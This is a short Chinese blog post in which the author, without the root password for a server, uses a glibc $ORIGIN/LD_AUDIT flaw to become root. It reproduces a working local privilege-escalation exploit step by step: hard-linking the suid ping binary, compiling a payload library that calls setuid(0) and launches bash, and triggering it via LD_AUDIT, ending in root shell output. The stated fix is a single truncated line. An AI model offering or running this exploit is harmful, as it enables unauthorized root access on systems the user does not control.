前言:額、一臺linux 服務器PHP 版本太低。。需要升級才能使用ThinkPHP框架,可是我沒有root密碼,無法升級,雖然是在虛擬集羣中的服務器,但是也沒有集羣的密碼,如果直接用修改啓動項方式去修改root密碼的話,1是太麻煩,2是額、技術含量也太低 。。經過一番百度、Google,發現2.6的內核有一個漏洞, N次失敗之後終於找到一能用的神器。操作過程如下。。 神奇的讓$---變成->#
我也不懂什麼意思,,直接上代碼:
It is possible to exploit this flaw to execute arbitrary code as root.
Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.
Exploitation would look like the following.
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target*
# Remove the directory previously created
$ rm -rf /tmp/exploit/
# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target (deleted)
# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat >payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
#此處有一個回車
#(此處ctrl+c結束 )
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx---1taviso taviso 4.2K Oct 1509:22/tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root sh-4.1# id
uid=0(root)gid=500(taviso)
漏洞解決方法(這是由GCC引發的一個漏洞):
升級:glibc、